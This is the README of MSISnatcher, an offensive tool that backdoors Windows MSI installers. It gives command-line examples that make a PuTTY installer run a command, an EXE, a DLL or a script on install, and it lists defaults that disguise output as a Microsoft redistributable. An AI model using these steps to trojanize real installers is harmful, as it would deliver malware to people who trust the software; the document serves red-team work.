# MSISnatcher

Your MSI Backdooring companion! 

A script that takes an MSI as input and, by manipulating its tables and inserting malicious records, backdoors it so that it runs our malware during installation.


## Examples

1. Execute something during MSI installation:

```
py msisnatcher.py -i putty-installer.msi execute -1 calc putty-backdoored.msi
```

2. Drop an EXE to `C:\Windows\Installer\MSIXXXX.tmp` and run it during installation:

```
py msisnatcher.py -i putty-installer.msi run-exe -1 malware.exe putty-backdoored.msi
```

3. Load a DLL (or .NET DLL) during installation (`MyMethod` is the name of the exported DLL function to invoke):

```
py msisnatcher.py -i putty-installer.msi load-dll -1 malware.dll -2 MyMethod putty-backdoored.msi
```

4. Load a VBScript/JScript file during installation (`RunMalware` is the name of a function defined in the script file that will be invoked; note this uses the `script` attack, not `load-dll`):

```
py msisnatcher.py -i putty-installer.msi script -1 malware.vbs -2 RunMalware putty-backdoored.msi
```

## Usage

```
usage:
Usage: msi-snatcher.py [options] <attack> <outfile.msi> [params]

options:
  -h, --help            show this help message and exit

Required arguments:
  attack                Specifies MSI attack action to inject. Supported attacks: drop-files, execute, script, run-exe, load-dll, dotnet
  outfile               Output produced/backdoored MSI file.

Options:
  -i INFILE, --infile INFILE
                        Backdoors input MSI file and saves it to <outfile>
  -v, --verbose         Verbose mode.
  -d, --debug           Debug mode.

Attack Parameters:
  -1 PARAM1, --param1 PARAM1
                        Attack specific #1 parameter
  -2 PARAM2, --param2 PARAM2
                        Attack specific #2 parameter
  -3 PARAM3, --param3 PARAM3
                        Attack specific #3 parameter
  -4 PARAM4, --param4 PARAM4
                        Attack specific #4 parameter
  -5 PARAM5, --param5 PARAM5
                        Attack specific #5 parameter

Properties used when creating a new MSI:
  -n NAME, --name NAME  Specifies application name. Default: "Microsoft Visual C++ 2013 Redistributable (64) - 12.0.RANDOM"
  -V VER, --app-version VER
                        Specifies product version. Default: "12.0.0.0"
  -g GUID, --guid GUID  Specifies application GUID. Default: random
  -m VENDOR, --manufacturer VENDOR
                        Specifies application manufacturer/vendor/company. Default: "Microsoft Corporation"

=====================================================

Supported MSI attacks:

   1. drop-files

        Save file(s) to system with option to run them after install.

        Attack Parameters:
                --param1 - Path to file(s)/directory to be bundled into MSI and later dropped onto infected system.
                --param2 - (optional) Run file #1 after installation. If neither --param2 nor --param4 are used, MSI will run file from --param1
                --param3 - (optional) Command line parameters for file #1
                --param4 - (optional) Target directory where to drop file. Can be: --param4 "C:\Users\Public" or --param4 "%LOCALAPPDATA%" or --param4 TARGETDIR (default)

   2. execute

        Run specified system command(s).

        Attack Parameters:
                --param1 - Command #1 to run

   3. script

        Run VBScript/JScript inside of msiexec.exe right after installation via CustomAction.

        Attack Parameters:
                --param1 - Path to VBscript/JScript file to execute
                --param2 - Function name defined in script to be invoked.

   4. run-exe

        Run Executable that will be extracted to C:\Windows\Installer\RANDOM.tmp and run by services.exe -> msiexec.exe

        Attack Parameters:
                --param1 - Path to executable to launched.
                --param2 - (optional) Command line parameters for executable

   5. load-dll

        Loads DLL into msiexec.exe during install via CustomAction DllEntry.

        Attack Parameters:
                --param1 - Path to DLL file to load
                --param2 - DLL Export function name

   6. dotnet

        Loads .NET DLL into msiexec.exe during install via CustomAction DllEntry (its the same action as load-dll).

        Attack Parameters:
                --param1 - Path to DLL file to load
                --param2 - DLL Export (adnotated) function name

=====================================================

```


---

## Disclaimer

Use of this tool, as well as any other projects I am the author of, for illegal purposes, unsolicited hacking or cyber-espionage is strictly prohibited.
This and other tools I distribute help professional Penetration Testers, Security Consultants, Security Engineers and other security personnel improve the cyber-defence capabilities of their customers' networks.
In no event shall the authors or copyright holders be liable for any claim, damages or other liability arising from illegal use of this software.

If there are concerns, copyright issues, threats posed by this software or other inquiries, I am open to collaborating on responsibly addressing them.

The tool exposes a handy interface for using mostly open-source or commercially available packers/protectors/obfuscation software, and therefore does not introduce any immediately new threats to the cyber-security landscape as is.

---

### ☕ Show Support ☕

This and other projects are the outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,
[consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better, a beer)_ just to say thank you! 💪

---

## Author

```   
   Mariusz Banach / mgeeky, '22-'23
   <mb [at] binary-offensive.com>
   (https://github.com/mgeeky) 
```
